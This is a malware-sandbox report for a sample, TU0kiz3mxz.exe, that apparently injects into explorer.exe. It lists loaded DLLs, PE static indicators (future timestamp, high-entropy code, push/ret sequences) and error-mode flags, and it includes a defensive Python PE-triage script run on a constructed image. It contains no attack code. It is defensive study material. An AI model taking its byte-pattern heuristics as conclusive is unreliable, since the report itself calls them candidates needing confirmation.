Source: C:\Windows\explorer.exe | Section loaded: wtsapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: wininet.dll
Source: C:\Windows\explorer.exe | Section loaded: uxtheme.dll
Source: C:\Windows\explorer.exe | Section loaded: dwmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
Source: C:\Windows\explorer.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: ntmarta.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
Source: C:\Windows\explorer.exe | Section loaded: wldp.dll
Source: C:\Windows\explorer.exe | Section loaded: iertutil.dll
Source: C:\Windows\explorer.exe | Section loaded: srvcli.dll
Source: C:\Windows\explorer.exe | Section loaded: netutils.dll
Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
Source: C:\Windows\explorer.exe | Section loaded: ninput.dll
Source: C:\Windows\explorer.exe | Section loaded: appresolver.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\explorer.exe | Section loaded: slc.dll
Source: C:\Windows\explorer.exe | Section loaded: sppc.dll
Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
Source: C:\Windows\explorer.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: starttiledata.dll
Source: C:\Windows\explorer.exe | Section loaded: idstore.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.applicationmodel.dll
Source: C:\Windows\explorer.exe | Section loaded: wlidprov.dll
Source: C:\Windows\explorer.exe | Section loaded: samcli.dll
Source: C:\Windows\explorer.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\explorer.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\explorer.exe | Section loaded: usermgrproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: policymanager.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\explorer.exe | Section loaded: winsta.dll
Source: C:\Windows\explorer.exe | Section loaded: sndvolsso.dll
Source: C:\Windows\explorer.exe | Section loaded: mmdevapi.dll
Source: C:\Windows\explorer.exe | Section loaded: devobj.dll
Source: C:\Windows\explorer.exe | Section loaded: oleacc.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositoryclient.dll
Source: C:\Windows\explorer.exe | Section loaded: textshaping.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.dll
Source: C:\Windows\explorer.exe | Section loaded: windowmanagementapi.dll
Source: C:\Windows\explorer.exe | Section loaded: textinputframework.dll
Source: C:\Windows\explorer.exe | Section loaded: inputhost.dll
Source: C:\Windows\explorer.exe | Section loaded: wintypes.dll
Source: C:\Windows\explorer.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\explorer.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.dll
Source: C:\Windows\explorer.exe | Section loaded: appextension.dll
Source: C:\Windows\explorer.exe | Section loaded: dcomp.dll
Source: C:\Windows\explorer.exe | Section loaded: d3d11.dll
Source: C:\Windows\explorer.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.cloudstore.schema.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: dxcore.dll
Source: C:\Windows\explorer.exe | Section loaded: d2d1.dll
Source: C:\Windows\explorer.exe | Section loaded: dwrite.dll
Source: C:\Windows\explorer.exe | Section loaded: xmllite.dll
Source: C:\Windows\explorer.exe | Section loaded: cldapi.dll
Source: C:\Windows\explorer.exe | Section loaded: fltlib.dll
Source: C:\Windows\explorer.exe | Section loaded: dataexchange.dll
Source: C:\Windows\explorer.exe | Section loaded: apphelp.dll
Source: C:\Windows\explorer.exe | Section loaded: tiledatarepository.dll
Source: C:\Windows\explorer.exe | Section loaded: staterepository.core.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepository.dll
Source: C:\Windows\explorer.exe | Section loaded: explorerframe.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\explorer.exe | Section loaded: mrmcorer.dll
Source: C:\Windows\explorer.exe | Section loaded: languageoverlayutil.dll
Source: C:\Windows\explorer.exe | Section loaded: bcp47mrm.dll
Source: C:\Windows\explorer.exe | Section loaded: twinui.pcshell.dll
Source: C:\Windows\explorer.exe | Section loaded: wkscli.dll
Source: C:\Windows\explorer.exe | Section loaded: wincorlib.dll
Source: C:\Windows\explorer.exe | Section loaded: cdp.dll
Source: C:\Windows\explorer.exe | Section loaded: dsreg.dll
Source: C:\Windows\explorer.exe | Section loaded: thumbcache.dll
Source: C:\Windows\explorer.exe | Section loaded: edputil.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe | Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe | Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe | Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe | Section loaded: secur32.dll
Source: C:\Windows\explorer.exe | Section loaded: version.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe | Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe | Section loaded: cscui.dll
Source: C:\Windows\explorer.exe | Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\explorer.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\explorer.exe | Section loaded: msvcp140.dll
Source: C:\Windows\explorer.exe | Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe | Section loaded: twinui.dll
Source: C:\Windows\explorer.exe | Section loaded: pdh.dll
Source: C:\Windows\explorer.exe | Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe | Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe | Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe | Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe | Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe | Section loaded: npsm.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe | Section loaded: mscms.dll
Source: C:\Windows\explorer.exe | Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe | Section loaded: tdh.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe | Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe | Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe | Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe | Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe | Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe | Section loaded: icu.dll
Source: C:\Windows\explorer.exe | Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe | Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe | Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe | Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe | Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe | Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe | Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe | Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe | Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe | Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: schannel.dll
Source: C:\Windows\explorer.exe | Section loaded: stobject.dll
Source: C:\Windows\explorer.exe | Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe | Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe | Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe | Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe | Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe | Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe | Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe | Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe | Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe | Section loaded: container.dll
Source: C:\Windows\explorer.exe | Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe | Section loaded: samlib.dll
Source: C:\Windows\explorer.exe | Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe | Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe | Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe | Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe | Section loaded: es.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe | Section loaded: wpnclient.dll
Source: C:\Windows\explorer.exe | Section loaded: dxp.dll
Source: C:\Windows\explorer.exe | Section loaded: shdocvw.dll
Source: C:\Windows\explorer.exe | Section loaded: atlthunk.dll
Source: C:\Windows\explorer.exe | Section loaded: syncreg.dll
Source: C:\Windows\explorer.exe | Section loaded: actioncenter.dll
Source: C:\Windows\explorer.exe | Section loaded: wevtapi.dll
Source: C:\Windows\explorer.exe | Section loaded: audioses.dll
Source: C:\Windows\explorer.exe | Section loaded: pnidui.dll
Source: C:\Windows\explorer.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\explorer.exe | Section loaded: netprofm.dll
Source: C:\Windows\explorer.exe | Section loaded: networkuxbroker.dll
Source: C:\Windows\explorer.exe | Section loaded: ethernetmediamanager.dll
Source: C:\Windows\explorer.exe | Section loaded: wlanapi.dll
Source: C:\Windows\explorer.exe | Section loaded: wscinterop.dll
Source: C:\Windows\explorer.exe | Section loaded: wscapi.dll
Source: C:\Windows\explorer.exe | Section loaded: dusmapi.dll
Source: C:\Windows\explorer.exe | Section loaded: ncsi.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\explorer.exe | Section loaded: werconcpl.dll
Source: C:\Windows\explorer.exe | Section loaded: framedynos.dll
Source: C:\Windows\explorer.exe | Section loaded: wer.dll
Source: C:\Windows\explorer.exe | Section loaded: hcproviders.dll
Source: C:\Windows\explorer.exe | Section loaded: wpdshserviceobj.dll
Source: C:\Windows\explorer.exe | Section loaded: portabledevicetypes.dll
Source: C:\Windows\explorer.exe | Section loaded: portabledeviceapi.dll
Source: C:\Windows\explorer.exe | Section loaded: cscobj.dll
Source: C:\Windows\explorer.exe | Section loaded: srchadmin.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.storage.search.dll
Source: C:\Windows\explorer.exe | Section loaded: synccenter.dll
Source: C:\Windows\explorer.exe | Section loaded: imapi2.dll
Source: C:\Windows\explorer.exe | Section loaded: ieproxy.dll
Source: C:\Windows\explorer.exe | Section loaded: bluetoothapis.dll
Source: C:\Windows\explorer.exe | Section loaded: sxs.dll
Source: C:\Windows\explorer.exe | Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe | Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe | Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe | Section loaded: mpr.dll
Source: C:\Windows\explorer.exe | Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe | Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe | Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe | Section loaded: credui.dll
Source: C:\Windows\explorer.exe | Section loaded: dui70.dll
Source: C:\Windows\explorer.exe | Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe | Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe | Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe | Section loaded: settingsync.dll
Source: C:\Windows\explorer.exe | Section loaded: settingsynccore.dll
Source: C:\Windows\explorer.exe | Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe | Section loaded: msxml6.dll
Source: C:\Windows\explorer.exe | Section loaded: windows.ui.xaml.dll
Source: C:\Windows\explorer.exe | Section loaded: windowsinternal.composableshell.desktophosting.dll
Source: C:\Windows\explorer.exe | Section loaded: uiamanager.dll
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: TU0kiz3mxz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: TU0kiz3mxz.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: TU0kiz3mxz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: explorer.pdbUGP source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Ppqg.pdbSHA2568 source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: TU0kiz3mxz.exe, 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1766250650.0000000004A01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1764277730.0000000004841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: TU0kiz3mxz.exe, TU0kiz3mxz.exe, 00000003.00000002.1763936313.0000000001090000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000005.00000003.1766250650.0000000004A01000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.1764277730.0000000004841000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004BB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4160775517.0000000004D4E000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: TU0kiz3mxz.exe, 00000003.00000002.1765605541.0000000002D70000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4153712059.00000000003C0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: Ppqg.pdb source: TU0kiz3mxz.exe, 00000000.00000000.1681040116.0000000000282000.00000002.00000001.01000000.00000003.sdmp, explorer.exe, 00000004.00000002.2641808257.0000000010C2F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4159209048.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4162692338.00000000050FF000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 0000000F.00000002.4173447490.000000000ABAF000.00000004.80000000.00040000.00000000.sdmp
Source: TU0kiz3mxz.exe | Static PE information: 0xACB40EDC [Tue Oct 25 15:57:16 2061 UTC]
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Code function: 3_2_0041B854 push edi; ret 3_2_0041B85C
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Code function: 3_2_0041E96F push ebp; ret 3_2_0041E986
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Code function: 3_2_0041E903 push edx; ret 3_2_0041E907
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Code function: 3_2_0041D475 push eax; ret 3_2_0041D4C8
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Code function: 3_2_0041D4C2 push eax; ret 3_2_0041D4C8
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Code function: 3_2_0041D4CB push eax; ret 3_2_0041D532
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Code function: 3_2_0041D52C push eax; ret 3_2_0041D532
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Code function: 3_2_010C09AD push ecx; mov dword ptr [esp], ecx 3_2_010C09B6
Source: C:\Windows\explorer.exe | Code function: 4_2_0E73DB1E push esp; retn 0000h 4_2_0E73DB1F
Source: C:\Windows\explorer.exe | Code function: 4_2_0E73DB02 push esp; retn 0000h 4_2_0E73DB03
Source: C:\Windows\explorer.exe | Code function: 4_2_0E73D9B5 push esp; retn 0000h 4_2_0E73DAE7
Source: C:\Windows\explorer.exe | Code function: 4_2_0E9129B5 push esp; retn 0000h 4_2_0E912AE7
Source: C:\Windows\explorer.exe | Code function: 4_2_0E912B1E push esp; retn 0000h 4_2_0E912B1F
Source: C:\Windows\explorer.exe | Code function: 4_2_0E912B02 push esp; retn 0000h 4_2_0E912B03
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04BB27FA pushad ; ret 5_2_04BB27F9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04BB225F pushad ; ret 5_2_04BB27F9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04BB283D push eax; iretd 5_2_04BB2858
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04BE09AD push ecx; mov dword ptr [esp], ecx 5_2_04BE09B6
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0296D4C2 push eax; ret 5_2_0296D4C8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0296D4CB push eax; ret 5_2_0296D532
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0296D475 push eax; ret 5_2_0296D4C8
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0296D52C push eax; ret 5_2_0296D532
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0296B854 push edi; ret 5_2_0296B85C
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0296E903 push edx; ret 5_2_0296E907
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_0296E96F push ebp; ret 5_2_0296E986
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04AAE9B5 push esp; retn 0000h 5_2_04AAEAE7
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04AAEB02 push esp; retn 0000h 5_2_04AAEB03
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 5_2_04AAEB1E push esp; retn 0000h 5_2_04AAEB1F
Source: TU0kiz3mxz.exe | Static PE information: section name: .text entropy: 7.494852033166654
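The static findings above (a link timestamp in 2061, the DllCharacteristics flags, a COM descriptor data directory marking the file as a .NET assembly, a .text section with entropy near 7.5, and push-register/ret sequences) can all be reproduced from the PE headers without a sandbox. The script below is an added example written for this report, not Joe Sandbox code: it parses the headers with struct, computes section entropy and scans for push r32; ret / push r32; retn imm16 pairs. The PE image it inspects is a constructed minimal PE32 carrying the report's timestamp value (0xACB40EDC), not the analysed sample; the analysis date and the 7.0 entropy threshold are assumptions. One caveat it encodes: deterministic .NET builds write a content hash with the high bit set into the timestamp field, so a post-2038 date on a CLR binary is a weak indicator on its own and should be read together with the entropy and injection evidence.

```python
"""Static PE triage: link timestamp, DllCharacteristics, CLR directory, section
entropy and push/ret gadgets. Added example; the image it checks is constructed."""
import math
import struct
from datetime import datetime, timezone

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DLL_CHARACTERISTICS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
                       0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE"}
COM_DESCRIPTOR_INDEX = 14        # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (.NET)
HIGH_ENTROPY = 7.0               # assumed threshold for packed/encrypted code
ANALYSIS_DATE = datetime(2025, 1, 9, tzinfo=timezone.utc)  # assumed "now"


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def find_push_ret(code: bytes, base: int = 0) -> list:
    """(address, mnemonic) for `push r32; ret` (5x C3) and `push r32; retn imm16` (5x C2 imm16)."""
    hits = []
    for i in range(len(code) - 1):
        if not 0x50 <= code[i] <= 0x57:          # push eax..edi
            continue
        if code[i + 1] == 0xC3:
            hits.append((base + i, "push; ret"))
        elif code[i + 1] == 0xC2 and i + 3 < len(code):
            imm = struct.unpack_from("<H", code, i + 2)[0]
            hits.append((base + i, f"push; retn {imm:04X}h"))
    return hits


def triage_pe(image: bytes, now: datetime = ANALYSIS_DATE) -> dict:
    """Parse the headers directly so the check runs without pefile."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = pe_off + 4
    _, n_sections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", image, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", image, opt)[0]           # 0x10B PE32, 0x20B PE32+
    dll_chars = struct.unpack_from("<H", image, opt + 70)[0]  # same offset for both formats
    dirs = opt + (96 if magic == 0x10B else 112)              # data directory table
    clr_rva, clr_size = struct.unpack_from("<II", image, dirs + 8 * COM_DESCRIPTOR_INDEX)
    compiled = datetime.fromtimestamp(timestamp, tz=timezone.utc)
    sections = []
    for i in range(n_sections):
        name, _vs, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, opt + opt_size + 40 * i)
        data = image[raw_ptr:raw_ptr + raw_size]
        ent = shannon_entropy(data)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"), "entropy": ent,
                         "high_entropy": ent > HIGH_ENTROPY, "push_ret": find_push_ret(data, va)})
    return {
        "timestamp": timestamp, "compiled_utc": compiled,
        "timestamp_in_future": compiled > now,
        # Deterministic .NET builds store a content hash with the high bit set here,
        # so a post-2038 date on a CLR binary is weak evidence by itself.
        "timestamp_high_bit": bool(timestamp & 0x80000000),
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dll_chars & bit],
        "is_dotnet": clr_rva != 0 and clr_size != 0,
        "sections": sections,
    }


def constructed_text_section(size: int = 4096) -> bytes:
    """Constructed .text contents: LCG noise (high entropy) with two gadgets planted."""
    state, out = 0x12345678, bytearray()
    while len(out) < size:
        state = (1103515245 * state + 12345) & 0xFFFFFFFF
        out.append((state >> 16) & 0xFF)
    out[0x100:0x104] = b"\x54\xC2\x00\x00"   # push esp; retn 0000h
    out[0x200:0x202] = b"\x57\xC3"           # push edi; ret
    return bytes(out)


def build_sample_pe(timestamp: int, text: bytes, dotnet: bool = True) -> bytes:
    """Constructed minimal PE32: DOS header, COFF header, 224-byte optional header, one .text section."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<H", opt, 70, 0x0040 | 0x0100 | 0x0400 | 0x8000)
    if dotnet:
        struct.pack_into("<II", opt, 96 + 8 * COM_DESCRIPTOR_INDEX, 0x2008, 0x48)
    raw_ptr = 512
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x2000, len(text), raw_ptr,
                          0, 0, 0, 0, 0x60000020)               # CODE|EXECUTE|READ
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + section
    return image + b"\0" * (raw_ptr - len(image)) + text


def triage_constructed_sample() -> dict:
    """Run the checks on the constructed image using the timestamp value from the report."""
    return triage_pe(build_sample_pe(0xACB40EDC, constructed_text_section()))


if __name__ == "__main__":
    r = triage_constructed_sample()
    print(f"linked {r['compiled_utc']:%Y-%m-%d %H:%M:%S} UTC future={r['timestamp_in_future']} "
          f"high_bit={r['timestamp_high_bit']} dotnet={r['is_dotnet']} {r['dll_characteristics']}")
    for s in r["sections"]:
        print(s["name"], f"entropy={s['entropy']:.2f}", [(hex(a), m) for a, m in s["push_ret"]])
```

Point triage_pe at the real file bytes to check a sample; the section loop reads every section, so a high-entropy .rsrc or a non-standard section name shows up the same way. The push/ret scan is a byte-pattern heuristic, not a disassembly, so treat its hits as candidates to confirm in a debugger at the addresses the report lists.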
Source: C:\Users\user\Desktop\TU0kiz3mxz.exe | Process information set: NOOPENFILEERRORBOX (reported 28 times)
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TU0kiz3mxz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
